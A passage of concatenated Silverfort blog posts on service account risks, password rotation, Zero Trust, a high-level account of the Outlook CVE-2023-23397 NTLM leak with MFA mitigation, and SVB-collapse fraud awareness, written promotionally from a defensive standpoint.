network; for example, vulnerability scanners, health management scanners, and code scanners. The Security Risks of Service Accounts Service accounts are indispensable, but not immune to security risks. In recent years, threat actors have increasingly leveraged compromised service accounts to gain unauthorized access and move laterally within an organization's network. There are several factors that contribute to the security risks associated with service accounts. Firstly, service accounts often lack visibility within an organization's security infrastructure. Due to their complex interdependencies with multiple processes, programs, and applications, it can be challenging to accurately track and monitor their behavior. This lack of visibility leaves service accounts susceptible to compromise, with threat actors able to exploit them without detection. Second, service accounts are frequently excluded from regular password rotation practices. Unlike human accounts that require periodic password changes, service accounts are often overlooked in password management efforts. A key reason for this neglect is the fear that changing passwords may disrupt critical processes. Consequently, compromised service accounts may provide threat actors with prolonged access to an organization's network that is undetected. Lastly, service accounts are often provisioned with unnecessary access rights and privileges. It is common for developers and administrators to assign broad permissions to service accounts in order to ensure seamless functionality, neglecting the principle of least privilege. This practice increases the potential impact of a compromised service account, as threat actors can leverage the account's elevated privileges to access sensitive systems and data. Why It’s Important to Understand the Security Risks of Service Accounts Although service accounts perform important functions in an environment, they can also pose critical security risks if not managed correctly. When a service account is created, for example, it can be inadvertently assigned a high level of privilege, equivalent to that of an admin. This, in turn, can create a security issue if admins are not fully aware (i. e. , have full visibility into) the exact behavior and activity of those accounts. Often, this is simply due to the improper documentation of these accounts which, as mentioned before, can be a challenge due to their high number as well as issues like IT staff turnover. Over time, this problem compounds, with the initial lack of awareness turning into a serious security blind spot. Here are some of the specific security risks organizations can face when managing service accounts: Discovering All Service Accounts One of the challenges of managing service accounts is discovering all the different service accounts that are being used. Since organizations can have hundreds or even thousands of service accounts, it can be a challenge to keep track and find every single service account and its activity. If an organization is not aware of all its service accounts, it won’t be able to secure them effectively. Visibility and Monitoring Because organizations often lack full visibility into service accounts and how they’re being used, it is difficult to detect any unauthorized access or malicious activity stemming from them. Complicating things is the fact that no identity infrastructure can automatically filter which users are service accounts from the overall list of users. Additionally, if service accounts are not associated with a specific user, it can be difficult to determine their activity and purpose. This can result in organizations being exposed to security risks, such as not detecting unauthorized access by threat actors which can lead to lateral movement attacks. High Access Privileges As stated previously, service accounts can often be assigned a level of privileged access similar to that of an admin. While the typical service account does not require domain-level access, these accounts sometimes end up with overprivileged access to ensure operational continuity. Organizations that are using service accounts for the automation of operational tasks will assign high-privilege access to ensure there is no downtime in their operations. This can create a challenge in terms of properly managing these privileged accounts against incoming identity-based attacks. No PAM Protection: Password Rotation is Not the Answer To manage risk, most organizations have turned to implementing password rotation as a strategy for keeping highly privileged accounts secure. But password rotation comes with limitations, as service accounts can’t be subject to password rotation for various reasons, such as the fact that they can be embedded in scripts and could break critical processes if their passwords are rotated. This would invalidate the password in the scripts, preventing the service account from accessing its target resource and subsequently breaking any process that relies on the service accounts’ task. Mitigating Service Account Risks To manage the potential exposures related to service accounts and address the concerns of cyber insurance underwriters, organizations can implement various risk mitigation practices. These practices include: Auditing and Inventorying Service Accounts Organizations should conduct regular audits to identify and inventory all service accounts within their network. This process involves determining the purpose and usage of each service account, as well as assessing the permissions and access rights associated with them. By maintaining an up-to-date inventory, organizations gain better visibility into their service accounts and can identify any accounts that are no longer in use. Password Rotation and Complexity Implementing a regular password rotation policy for service accounts is essential to enhance security. While changing passwords for service accounts can be challenging due to potential disruptions, organizations must strike a balance between security and operational continuity. Ensuring that passwords are complex and resistant to brute force attacks further strengthens service accounts' security. Denying Interactive Logins To prevent the unauthorized use of service accounts, organizations should configure the accounts to deny interactive logins. This setting restricts the usage of service account usernames and passwords on typical human login screens, mitigating the risk of unauthorized access. By implementing this measure, organizations can limit threat actors' exploits of service accounts. Privileged Access Management (PAM) Implementing a Privileged Access Management (PAM) solution can significantly enhance service account security. PAM solutions provide a centralized platform for managing, securing, and monitoring privileged accounts, including service accounts. By enforcing the least privilege principle, organizations can restrict service accounts to only the necessary permissions required for their intended tasks. Regular Review and Mitigation Organizations should establish a process for regularly reviewing service account requirements and permissions. This review ensures that service accounts have only the necessary permissions and helps identify any potential security gaps or unnecessary access rights. By continuously assessing and mitigating risks, organizations can proactively address vulnerabilities in their service account management practices. Monitoring and Alerting Implementing robust monitoring and alerting mechanisms for service accounts is critical for detecting abnormal or malicious behavior. Organizations should establish monitoring rules specific to service accounts and configure their security operations centers (SOCs) to receive alerts in response to suspicious activities. Monitoring solutions powered by machine learning algorithms can help organizations establish baseline behaviors for service accounts and identify deviations that may indicate a compromise. Next Up: Analyzing Attacks Where Service Accounts Were Used Now that we’ve covered the basics of service accounts, including what they’re used for and the security risks they present, our next post will dive deep into different security breaches where service accounts were used and, in some cases became the entry point for the threat actors. --- - Published: 2023-05-02 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/service-accounts-security-best-practices/ Managing service accounts can be a daunting task for organizations, as service accounts are scattered across different environments and are used by various business applications, and are typically forgotten about unsupervised. Meaning in most organizations nobody is tracking their use or validating that they are not compromised or used by malicious actors. On top of managing these accounts, organizations often lack full visibility into service accounts and how they’re being used, and are seen as low-hanging fruit for threat actors. However, service account management is a critical task that should not be overlooked, as service accounts often have privileged access and are used by applications, scripts, and services to authenticate and interact with various systems and resources. If service account management is overlooked, it can lead to malicious actors with access to compromises service accounts carrying out malicious activities such as lateral movement. In this post, we will explain how Silverfort enables you to manage your service accounts easily, through automated detection, monitoring, and protection. As a result, Silverfort is able to provide full visibility, risk analysis, and adaptive access policies for service accounts without the need for password rotation. Best Practices for Service Accounts Protection While service accounts can be associated with an owner and these accounts' activities should be continuously monitored, they should not have the same privileges as a regular user account. This means that service accounts should not have interactive user interface privileges or the ability to operate as normal users. By implementing Silverfort’s Unified Identity Protection platform, organizations can apply best practices to get their management of service accounts under control. This involves a three-step approach: Discover all service accounts Monitor activity and risk analysis Analyze and enable access policies With these capabilities implemented, service account management is no longer a nightmare, and, at the same time, the risk of security breaches caused by mismanaged service accounts is dramatically reduced. Here are more details on Silverfort’s three-step approach: 1. Discovery The first step to properly managing and protecting all service accounts is knowing exactly where they reside. Here are several key questions to ask: What service accounts do you have? What is the total number of service accounts? Which assets use those service accounts? Silverfort’s Service Accounts screen displays the service account name, source, destination, number of authentications, risk score, and account info This is done when an organization connects its domain controllers to Silverfort. Silverfort is then able to automatically identify all service accounts, providing complete visibility into their behavior patterns. This is because, as machine accounts, service accounts display predictable behavior patterns, allowing Silverfort to identify and categorize them automatically. Silverfort identifies and categories three main types of service accounts: • Machine to Machine (M2M) Accounts– defined on Active Directory (AD) or another user repository • Hybrid Accounts – used by both users and machines • Scanners – used by a few devices to communicate with a large number of resources inside a network Silverfort can also quickly identifies any accounts that follow usual service account naming conventions (e. g. “admin” or “svc”), as well as any custom naming conventions that may be used by the organization. Because Silverfort can detect all machine-like behavioral patterns, it can also flag whether an account is also being used by a human user and alert on this bad practice. Silverfort detects the erratic patterns associated with human user activities that do not correlate with the machine’s behavior patterns and alerts the irregular activity of the service account.   2. Monitoring & Risk Analysis The next and continuous phase is monitoring all service account activity and associated risks. Now that there is a complete picture with full visibility into all service account details and behavior, Silverfort constantly monitors and audits their use. Silverfort’s Investigation screen shows various insights into a specific service account's activity.   Silverfort can identify different configurations and behaviors of service accounts, such as high-level permissions, broad use, repetitive behavior, etc. Silverfort then adds risk analysis and level of predictability to each service account to enable administrators to better understand the degree to which specific service accounts are at risk. By continuously monitoring all authentication and access activity, Silverfort can assess the risk of every authentication attempt and thus immediately detect any suspicious behaviors or anomalies, providing SOC teams with actionable insights into overall service account activity. The importance of monitoring and auditing Active monitoring and auditing are crucial components of service account management. By keeping a close eye on the activities of these accounts, organizations can swiftly detect any suspicious behavior and take necessary action to prevent potential breaches. Active Monitoring and Anomaly Detection Active monitoring involves continuously tracking and analyzing the activities of service accounts to identify any deviations from normal behavior patterns. This could be an unusually high number of failed login attempts, modifications to account privileges, or changes in login locations or times. By setting up automated alert systems, organizations can be notified of such anomalies in real-time, enabling them to respond promptly to potential threats. Auditing and Authentication Monitoring The purpose of auditing is to ensure compliance with organizational policies and regulatory requirements by conducting periodic reviews of service account activities. Authentication monitoring, on the other hand, focuses on verifying the identities of the users attempting to access service accounts. Both these measures help in maintaining accountability and enhancing the overall security of service accounts. Visibility and Auditing Challenges Managing service accounts comes with numerous visibility and auditing challenges. Without proper tools and processes in place, it can be difficult to keep track of all service accounts within an organization, especially in large-scale environments with hundreds or even thousands of accounts. Dormant and Forgotten Service Accounts One common issue is the existence of dormant or forgotten service accounts. These are accounts that have been created for a particular purpose but are no longer in use, either because the project they were associated with has ended, or the employee who created them has left the organization. These dormant accounts can pose a serious security risk as they could be exploited by malicious actors to gain unauthorized access to the system. Therefore, it's important to regularly audit service accounts and deactivate any that are no longer needed. Sharing of Service Account Credentials While this may seem convenient to share the credentials, it significantly increases the risk of a security breach. If the credentials are compromised, all services using those credentials become vulnerable. To mitigate this risk, each service should have its own dedicated service account with unique credentials. 3. Analyze & Access Policies Once full visibility and insight into all service accounts are achieved, the next phase is to analyze these insights and create access policies to provide a digital fence for these non-human accounts. Silverfort displays a list of sources and destinations using the service accounts, as well as the number of hits (authentications) Silverfort enables admins to analyze their service accounts' insights to identify certain service account behaviors. Silverfort shows the number of hits per source and destination. This helps admins prioritize the different sources and destinations that their service accounts connect to, ensuring they are properly monitored and protected. With the help of Silverfort, admins will examine the service account behavior, using one of the following methods: 1. Understand which users are used by the crown jewels applications and analyze these service accounts. 2. Analyze the critical risk level accounts and then go through the chain to the lower risk levels (from the risk levels provided by Silverfort). 3. Analyze and prioritize the service accounts with high privileges and then continue to the accounts that are broadly used and finish with accounts with interactive logins. After analyzing the service accounts, Silverfort automatically recommends specifically tailored policies for each service account. Each security policy is formulated to lower the network risk level without blocking the traffic and tracking policy violations. This is focused on monitoring the traffic and allows the admin to make sure that the created policy is full without impacting the traffic. Silverfort has three types of authentication policies for service accounts: Block access Alert to SIEM Alert For each policy created with Silverfort, administrators can choose sources, destinations, authentication protocols, when policies should be applied, and what actions the system should take in case of a deviation. In the case of an organization with a large number of service accounts, Silverfort allows admins to create general policies that can be assigned to multiple service accounts. This can be done by using Silverfort’s recommended policies. Once policies have been created for all service accounts with Silverfort, admins can simply enable and automatically enforce these policies without the need to make any changes to applications, change passwords, or make use of any proxies. With complete visibility into these accounts and the ability to proactively protect service accounts with access policies ,organizations will now be well-equipped to reduce their attack surface area from compromised service accounts. Creating and Implementing Policies Companies should standardize the creation of service accounts in accordance with their company’s security policies. This includes defining which organizational resources the service accounts should be assigned to, and any other Active Directory (AD) attributes required. A workflow for requesting service account creation and the proper approval steps should be established, along with a process for assigning ownership of the account. Managing and Rotating Service Account Credentials Proper management of service account credentials is essential to maintaining their security. This involves regularly rotating the passwords of service accounts and ensuring that they are stored securely. The use of automated solutions can greatly simplify this process and eliminate the possibility of human error. Manual vs Automated Management While manual management of service account credentials is possible, it is extremely time-consuming and prone to errors. On the other hand, automated management solutions provide a more efficient and reliable way of handling service account credentials. These tools can automatically generate strong passwords, rotate them periodically, and store them securely, reducing the risk of unauthorized access. Risks of Credential Reuse Reusing the same credentials across multiple service accounts significantly increases the risk of a security breach. If one account gets compromised, all other accounts with the same credentials become vulnerable. Therefore, each service account should have unique credentials, and these should be regularly changed to minimize the risk of a breach. Ensuring Accountability and Oversight Accountability and oversight are critical aspects of service account management. This involves assigning ownership of each service account to a specific individual or team within the organization. The owner is responsible for the management and security of the account, including approving any changes to the account settings and monitoring its activity. This level of accountability helps to maintain control over service accounts and ensures that any suspicious activity is quickly identified and addressed. Challenges of Service Account Management Even though service accounts are essential for the proper functioning of numerous applications and services, managing them presents several challenges. One of the main issues is the difficulty in determining their activity and purpose when they are not associated with a specific individual. Lack of visibility into these accounts may expose organizations to security risks, including unauthorized access by threat actors, resulting in lateral movement attacks. Service account management generally faces the following challenges: The lack of standardized policies and procedures for creating and implementing service accounts: Without clear policies, organizations may struggle to define which service accounts should be assigned to and what attributes are required. This can lead to confusion and inconsistency in managing service accounts. Difficulty in centralized provisioning: Managing service accounts becomes more complex when the process is not centralized. Centralization simplifies management, reduces unauthorized access, and ensures that only authorized personnel can create, modify, and delete service accounts in order to avoid service account sprawl. Can't rotate service account passwords: Password rotation is ineffective when applied to high-privileged service accounts. This is due to the fact that these accounts are typically accessed by executing a script that stores their login credentials. Credential reuse risks: Credential... --- - Published: 2023-04-21 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/five-reasons-why-silverfort-is-the-ultimate-first-step-on-your-zero-trust-journey/ Zero Trust has traditionally been thought of in the context of a network, with implementation considered a project primarily focused on upgrading and segmenting legacy infrastructure. As long as the access to all physical assets was controlled, the thinking went, that could act as a proxy for extending trust in the form of access to users. But this paradigm has proven to be flawed, especially with the dissolution of the traditional perimeter and the resulting surge in users accessing resources from outside an organization’s network. Because accessing resources is based on user authentication, the natural place to begin a Zero Trust journey is with identity. But with identity-based attacks such as ransomware increasing, the problem is figuring out exactly where to begin – including how existing security products can contribute as well as determining the role PAM products and MFA solutions should play. In this post, we’ll suggest five reasons why the Silverfort Unified Identity Protection platform can provide the ideal first step in evolving an identity-focused Zero Trust initiative from an abstract vision to a concrete reality. Reason #1: Silverfort Can Provide Centralized Visibility Into Every Authentication and Access Request Because most organizations today operate a hybrid environment, this means there is usually one set of identity providers managing cloud resources (SaaS apps, cloud workloads, etc. ) and others that manage the on-prem assets, such as servers, workstations, and legacy apps. In some cases, there can also be additional products involved in identity and access management, such as Privileged Access Management (PAM) solutions. The result is that user activity is widely distributed across many different areas, with no easy way to gather all of this data into one central spot. Further complicating things is the issue of user type, since standard users, privileged users, third-party users, and non-human users (also called machine-to-machine accounts or service accounts) each come with unique challenges around visibility and monitoring. Silverfort solves this challenge because it has native integrations with every identity provider, enabling it to log every authentication request happening in an environment and thus provide a unified view of all network activity across every user and any resource. Reason #2: Silverfort Can Determine Whether Every Access Attempt is Benign or Malicious Ideally, organizations would have a complete view of all user behavior and be able to evaluate the context of every request before granting access. This could be done by using risk analysis in combination with identify verification to decide whether each request was legitimate or actually coming from an adversary using compromised credentials. But the fragmented nature of the hybrid environment makes the gathering and processing of all data associated with authentication and access requests a serious obstacle. There is also the challenge of normalizing the different risk scores being generated by various engines, as well as the fact that there are very few solutions available that can analyze the actual authentication packets themselves in order to detect any anomalies. Silverfort solves this issues because of its ability to see all network activity, which means it can evaluate the full context of every authentication. With that amount of information, Silverfort can build a highly sophisticated risk analysis engine to determine the legitimacy of every single authentication happening within the environment. Reason #3: Silverfort Can Block Malicious Access in Real Time If an access request can’t be trusted, it should be blocked. Specifically, this blocking should happen in real time as a result of secure access controls triggered by a policy that spans every type of user, access interface, and resource. However, this is no easy task, especially for on-prem resources. This is because the main authentication protocols (Kerberos and NTLM) used by Active Directory (AD) do not actually support MFA. As a result, there is no way to enforce real-time protection on the resources that it manages (which include legacy applications, file shares, and command-line interfaces). But Silverfort has the ability to actively enforce policies on these resources due its ability to see all authentications taking place in AD. With the platform’s own MFA capabilities, as well as its integrations with every third-party MFA provider on the market (including Okta, Duo, Ping, Microsoft Authenticator, HYPR, Yubico, and RSA), Silverfort can block any malicious access request in real time. Reason #4: Silverfort Can Apply Context and Enforcement to Every Resource To fully implement an Identity Zero Trust framework, organizations would have the ability to apply sophisticated risk analysis and take enforcement action on each level of access to every single resource. This would mean, for example, being able to apply policies to each one of the resources within a network segment, rather than just at the gateway. Having this ability would give IT teams the ability to make much better decisions on how best to protect enterprise resources from compromise or inappropriate access while also taking into account other key factors like productivity and user experience. Because Silverfort integrates with every product in the security stack – including all SIEM tools, EDR/XDR solutions, and SOAR software – access enforcement policies can be finely tuned, adjusted on a granular level for each resource. Reason #5: Silverfort Offers Rapid Deployment and Immediate Time to Value Perhaps the biggest challenge in implementing Zero Trust is finding solutions that can be implemented quickly and return value to the organization right away. PAM solutions provide an important security layer that includes the monitoring of admin connection (via session recording) and a prevention layer in the form of a vault for admin credentials and the rotation of their passwords. However, PAM programs are known to have lengthy and complex deployment, often stretching over months and even years. Silverfort’s solution, on the other hand, can be rolled out very quickly with most deployments taking less than 30 days. This means organizations can see real value right away; for example, through protecting all service accounts. Because Silverfort can see all authentications in the environment, it can discover any machine-to-machine accounts due to their highly predictable behavior. Silverfort can then automatically create policies to protect these (often highly privileged) accounts from compromise. This discovery and protection of service accounts is one of the biggest hurdles to a successful PAM implementation. Learn More About Silverfort Unified Identity Protection Silverfort’s solution features an innovative agentless and proxyless technology that runs in the backend of an existing IAM infrastructure to stop identity threats in real time. This means organizations can now confidently implement an identity-focused Zero Trust approach through the protection of areas most often targeted by threat actors in data breaches and ransomware attacks — legacy systems, command-line interfaces, and service accounts. Interested in seeing how Silverfort can accelerate your Identity Zero Trust journey? Request a demo here. --- - Published: 2023-04-11 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/rotating-service-account-passwords/ Regularly rotating service account passwords is a critical cyber security best practice, yet it remains an often overlooked process in many organizations. Service accounts provide broad access and control, so if compromised they pose a serious threat. For IT managers and cyber security professionals, implementing a mandatory service account password rotation policy and procedure is a straightforward way to shrink an organization's attack surface and strengthen its security posture overall. Though a basic practice, when deployed properly password rotation can serve as an effective safeguard against unauthorized access and data theft. Understanding Service Accounts and Their Vulnerabilities Service accounts provide automated access for applications, software, and IT systems. However, their broad permissions also make them an attractive target for cybercriminals. If compromised, service accounts can grant attackers sweeping control and access. To reduce risks, organizations must implement strong, multi-factor authentication and regularly rotate service account passwords. Failing to do so provides a window of opportunity for unauthorized access. Studies show that stolen or cracked passwords are a leading cause of data breaches. Rotating passwords entails changing service account credentials periodically, such as every 90 days. This limits the usefulness of any compromised passwords and forces attackers to continually work to maintain access. When rotating passwords, IT teams should generate highly complex, random passwords containing a minimum of 16 characters, including a mix of letters, numbers and symbols. Simply changing default passwords is insufficient. Attackers can easily guess commonly used passwords or access them through social engineering. Highly complex, frequently rotated passwords are exponentially more difficult to crack. They significantly reduce risks that a compromised service account may go undetected, with attackers operating freely in the network. The Risks of Static Passwords for Service Accounts Service account passwords that remain static for long periods of time pose serious risks. Regular password rotation is critical for mitigating threats and protecting systems. Lack of Rotation Invites Targeting If cybercriminals identify a service account with a static password, they can focus efforts on compromising that account. Rotating passwords regularly makes accounts less susceptible to brute force attacks and more difficult for malicious actors to access. Increased Attack Surface Rotating service account passwords also decreases the overall attack surface. The longer a password remains static, the more time adversaries have to employ brute force guessing or reuse compromised credentials across systems and accounts. Routine password changes force malicious actors to re-start the guessing process, making password cracking attempts more difficult and time-consuming. Static Passwords Enable Lateral Movement Once inside a system, attackers often move laterally to access additional accounts and resources. Service accounts with unchanging passwords are easy targets, allowing adversaries to spread throughout the network. Frequently changing service account credentials restricts an intruder's ability to access critical systems and data. Compliance Requirements Mandate Rotation Many industry standards, including PCI DSS, HIPAA, and NIST 800-53, require service account passwords be rotated periodically based on risk levels. Failure to rotate passwords for service accounts can result in policy violations and compliance failures, damaging an organization's reputation and credibility. Implementing Password Rotation Strategies Automated password rotation strategies offer significant benefits over manual rotation. Automation ensures password changes occur as scheduled without relying on human intervention. This reduces the risk of passwords expiring or remaining static for extended periods. Frequency For service accounts, industry experts recommend rotating passwords every 30 to 90 days. More frequent rotation, every 30 days, provides maximum security but requires additional overhead to implement and maintain. Less frequent rotation, every 90 days, reduces workload but may increase vulnerability. Organizations should evaluate their risk tolerance and security requirements to determine an optimal rotation frequency. Implementation To implement automated password rotation, organizations have two options: Use native tools within operating systems and software. Many systems like Windows Server and Oracle Database offer built-in password rotation functionality. However, native tools often lack robust reporting and auditing capabilities. Deploy a third-party password rotation solution. These solutions provide a centralized console to manage password rotation across all systems and services. They offer strong encryption, detailed reports and audits, and integration with existing directory services. Solutions can rotate local account passwords, domain account passwords, and service account passwords across multiple platforms. For service accounts, automated password rotation is a critical cybersecurity best practice. Native tools or third-party solutions enable organizations to rotate passwords regularly without significant manual effort. When selecting a solution, consider the frequency of rotation needed, reporting requirements, and the diversity of systems within the organization. With the right strategy and tools in place, automated password rotation can eliminate a key vulnerability and strengthen security posture. Log and monitor rotation events All password rotation events should be logged to provide an audit trail. Monitoring logs helps identify any issues with the rotation process and ensures passwords are being properly updated. Logging also gives administrators visibility into service accounts that may not be following the rotation schedule. Test in a controlled environment first Before deploying a password rotation strategy in a production environment, organizations should test it in a controlled setting. Testing helps work out any issues with the automation or logging of the rotation events. It also provides an opportunity to ensure all integrated systems continue functioning properly with the new passwords. Tools and Automation to Simplify Password Rotation Tools and automation can simplify the process of rotating service account passwords. Password rotation tools can automatically generate, distribute, and validate new passwords for service accounts according to the organization’s password policy. Password Rotation Tools Tools like ManageEngine Password Manager Pro enable IT teams to automate password rotation for local accounts, domain accounts and service accounts across systems. These tools can generate random, complex passwords that meet password policy requirements and automatically update them on schedule. They provide an audit trail for compliance and send email notifications to account owners about password changes. On the other hand, Silverfort secures service accounts with automated discovery and monitoring of all service accounts, including the ones you’re not aware of, with fully automated visibility, risk analysis and adaptive Zero Trust policies, without requiring password rotation. Scripting for Custom Rotation For organizations with unique needs, scripting is an option to build customized password rotation. Scripts can be created using languages like PowerShell to automatically generate new passwords, update them on systems, and validate the changes. While scripting requires technical resources to develop and maintain, it provides maximum flexibility and control over the password rotation process.  Active Directory Active Directory (AD) plays a critical role in managing service accounts and implementing password rotation policies within a network environment, especially in enterprise settings. Here’s how: 1. Service Account Management Active Directory is pivotal for managing service accounts which are used by applications or services to interact with the network and access resources. Service accounts can be managed centrally, allowing for better control and oversight. 2. Password Policy Enforcement AD allows the configuration and enforcement of password policies, including those related to password rotation, complexity requirements, and expiration. 3. Audit and Compliance Active Directory provides logging and auditing capabilities that are essential for tracking password changes, accessing attempts, and ensuring compliance with internal and external mandates. 4. Access Control AD's role-based access control (RBAC) capabilities ensure that service accounts have the appropriate level of access, which is crucial for minimizing the risk associated with overly permissive service accounts. 5. Single Sign-On (SSO) and Group Policy Objects (GPO) Utilizing features like Single Sign-On and Group Policy Objects can simplify the management of service account passwords and enforce rotation policies across the organization. 6. Notification and Alerting AD can be configured to provide notifications or alerts for expiring passwords, ensuring timely rotations and reducing the likelihood of service disruptions due to expired credentials. The Bottom Line: Rotating Passwords Mitigates Risk Regularly rotating service account passwords is one of the most effective ways to reduce the risk of account compromise. Static, unchanged passwords provide a larger window of opportunity for unauthorized access. Rotating passwords on a frequent schedule, such as every 30-90 days, helps limit this exposure. Enforcing periodic password changes, in combination with complex, unique passwords for each account, makes it exponentially more difficult for cyber criminals to access systems and maintain that access long-term. Though it requires additional effort to regularly update passwords, platforms like Silverfort can secure service accounts without the need to rotate passwords. --- - Published: 2023-03-16 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/silverfort-protection-against-cve-2023-23397-outlook-zero-day/ In the latest Patch Tuesday, Microsoft released a patch for CVE-2023-23397 Zero Day in Outlook, which was reported to be exploited in the wild. Exploitation of this vulnerability enables an adversary to grab NTLM hashes (equivalent to user credentials) from the targeted machine and use them for malicious access to other machines in the environment. All this would take place as soon as a crafted email is downloaded to the machine’s inbox without any need of interaction from victim’s side. Microsoft has rated the severity of this vulnerability 'critical' and traced its exploitation to a Russian APT group targeting a limited number of organizations in government, transportation, energy, and military sectors in Europe. In this article we provide a brief analysis of CVE-2023-23397 and show how Silverfort's Unified Identity Protection platform can mitigate its exploitation's impact with a simple policy that enforces MFA on NTLM authentications. CVE-2023-23397 High-Level Analysis Description of the Targeted Outlook Component CVE-2023-23397 is an Elevation of Privilege vulnerability in Outlook Client for Windows. It abuses an antique attribute that still exists that enables a customized alert sound of a scheduled appointment. According to Microsoft’s documentation the attribute ‘PidLidReminderFileParameter’ accepts a full path of a sound file. This field supports the Universal Naming Convention (UNC) path to access remote files and folders using the standard network file-sharing protocol SMB. When the appointment is overdue, it triggers the customized sound and forces Outlook to reach the remote file. Where is the Vulnerability in this Component? The problem with this behavior is that during the creation of the SMB session, an NTLM authentication is made to the remote server. Snatching the session can allow an adversary to perform an NTLM Relay attack against another service on behalf of the victim, or alternatively bruteforce the NTLM hash and achieve the user’s password. So, first and foremost, we strongly recommend upgrading all Outlook clients for Windows to its latest version. CVE-2023-23397 Risk: Credential Theft Without User Interaction Required The unique concern regarding this vulnerability is that it can be triggered without any user interaction at the moment the Outlook client receives the malicious appointment. This is because the faulty attribute is triggered in case the appointment is overdue. This dramatically sets it apart from any vulnerability that requires interaction such as opening an attachment or clicking a link. The entire exploitation process takes place in the background, providing the adversary the ability to access resources on the user’s behalf. The common security stack in today’s organization lacks the ability to detect and prevent in real-time lateral movement attacks that employ NTLM relay. This makes CVE-2023-23397 an immediate threat that must be addressed. Silverfort Mitigation to Exploitation of CVE-2023-23397 Silverfort's Unified Identity Protection platform can protect against the exploitation of CVE-2023-23397. While Silverfort won’t prevent the exploitation itself it would deprive the adversary’s ability to utilize the stolen hash for malicious access, with a simple MFA policy. Silverfort performs continuous, real-time monitoring, risk analysis and policy enforcement for all authentications in the AD environment. As such, it can identify NTLM authentications and leverage this identification to trigger MFA verification. Recommended Policy to Protect Against Potential NTLM Relay Attacks We recommend the following:  1. Configure an NTLM policy for any server that is exposed to the internet. As an additional precaution measure, you can also include sensitive resources that aren’t exposed to the Internet, since this vulnerability can also be applied from inside the network. 2. Apply MFA policy for non-NTLM authentication protocols, as there are variants of how the vulnerability can be exploited where the password can be brute forced, providing the attacker the ability to use it with other authentication protocols as well.   Screenshot #1: A sample policy that implements recommendation #1. Per recommendation #2, you can configure additional policies in which Kerberos and LDAP(s) would be checked. Also, in the source field, you can also add any sensitive resource you want to include in this protection. If you find the ability to protect NTLM and other AD protocols with MFA, feel free to reach out and request a demo or visit our website. --- - Published: 2023-03-13 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/take-caution-top-3-security-risks-and-mitigation-practices-following-svb-collapse/ The collapse of Silicon Valley Bank bears direct implications on adversaries’ activity. As always, uncertainty and panic are threat actors’ closest allies, and we're already hearing reports on a distinct surge in fraud attacks that attempt to leverage the confusion and concerns to lure users into fraudulent transfers as well a credential disclosure. In this article we summarize the main risks organizations are likely to be exposed to, as well as best practices to proactively encounter and mitigate them (such as enabling MFA on banking systems). Risk #1: Fraudulent Transfers Sample Scenario The most typical pattern would be impersonating as a legitimate destination for money transfer. For example, the adversary will impersonate one of your suppliers, claiming that it has moved from SVB to another bank, urgently asking you to wire payment to this new account. The unsuspecting victim wires the payment to the attacker’s bank account. Mitigation Steps Remind your workforce to avoid performing transactions to accounts whose details they received via email. Any change in existing wiring destinations must be explicitly verified rather than immediately trusted. This verification should be reaching out to the actual person the email presumes to come from and validating that they really sent the request and not an impersonating adversary. As a supplier, proactively inform your customers what the reliable processes are to inform on any changes in your bank accounts. Risk #2: Phishing for Bank Account Credential Sample Scenario Adversary sends an email, impersonating as FDIC, SVB, or another government agency containing a reassuring message that your deposits in SVB can be fully returned. However, for this to happen you should urgently login to your new bank account in a provided link. This link, needless to say, leads to an adversary-controlled web page, and your credentials are now compromised. Mitigation Steps Remind your workforce to increase their vigilance to emails that request credentials insertion, or even better – ban any form of providing credentials to links incorporated in email messages. It’s also recommended to expand this policy to any sort of inbound communication, including phone calls and text messages. Specifically for the scenario described above, don’t take any independent action, but rather follow official online sources for instructions for receiving your money back. Risk #3: Spreading Panic Sample Scenario In addition to the above direct risks, adversaries may also attempt to leverage the existing, tense atmosphere to accelerate panic and uncertainty by spreading fake news on alleged collapse risk of additional banks. You may see viral messages informing you that the banks you’re working with are at risk, urging you to withdraw your deposits before it becomes too late. Mitigation Steps Only trust official communication channels from your banks and avoid forwarding unvalidated messages. Complement Workforce Security Education with Hardening your Email Security Your business email is the primary attack vector adversaries employ to deliver fraud attacks. While employee education is paramount, it must have a security technology counterpart, making the prevention of business email compromise a crucial task. To prevent threat actors from compromising user accounts and sending messages on their behalf, you should enforce the following: Enforce MFA verification on any access to employee’s email address. Disable legacy email protocols that are more susceptible to compromise. Block access to email from risky locations Conclusion While remaining secure in times of crisis is challenging, it’s a task within your reach. The calmer you stay, and the more this calmness is implemented in the day-to-day security practices of your employees, the more resilient your environment will be to the building up wave of fraud attacks. --- - Published: 2023-03-02 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/mfa-and-administrative-access-protection-are-the-means-but-to-what-end/ Every so often in cybersecurity it’s useful to reflect on things taken for granted and choices made — specifically why they were made and whether these things achieved their purpose. For example, let’s examine the use of MFA and the protection of administrative access. We know these are critical but why? Furthermore, what does it mean to not have these security measures in place? In this article, we’ll examine some commonly accepted (but equally ignored) truths about the objectives behind MFA and privileged access control, the risks they mitigate, and the barriers to getting them fully deployed across an environment. We’ll conclude by demonstrating how Silverfort’s Unified Identity Protection platform enables identity and security teams to close these gaps and ensure their environments are protected against account takeover, lateral movement, and ransomware spread. Recap: What Are MFA and Administrative Access Controls? MFA and administrative access controls augment the user authentication process by adding a protection layer on top of basic username-password match. The rationale is that credentials can get compromised, which means adversaries would be able to log in using a legitimate username and password. MFA mitigates this scenario by ensuring that the true user is challenged to verify its identity by providing a genuine identifier the adversary is unlikely to have. A Privileged Access Management (PAM) solution can achieve essentially the same thing by making the act of credential compromise significantly harder, via vaulting and regular password rotation. The False Purpose: A Checkbox Mentality That Inevitably Leads to Security Gaps The most common error that identity or security teams make with MFA is mistaking the means for an end. For example, thought processes like “We need to apply MFA in order to be compliant with regulation X,” or “We need to increase MFA coverage so we can show management we’re making progress. ” This type of thinking is fundamentally flawed, since it ensures that whenever a technological barrier to deploy either MFA or privileged account access controls appears (we’ll show examples of these later in this article), the deployment simply won’t happen. Compliance requirements might be able to be satisfied with some vague compensating control, with protection coverage progressing only incrementally — by protecting what’s easy to protect, rather than what will substantially improve the environment’s resilience. The reality is that the only way to achieve better protection is to constantly keep in mind what it is we’re seeking to achieve. So let’s examine what exactly is the protection we want to achieve with MFA and administrative access controls, and what the threats are we’re attempting to mitigate. The True Purpose: Prevent Identity Threats Such as Account Takeover, Lateral Movement, and 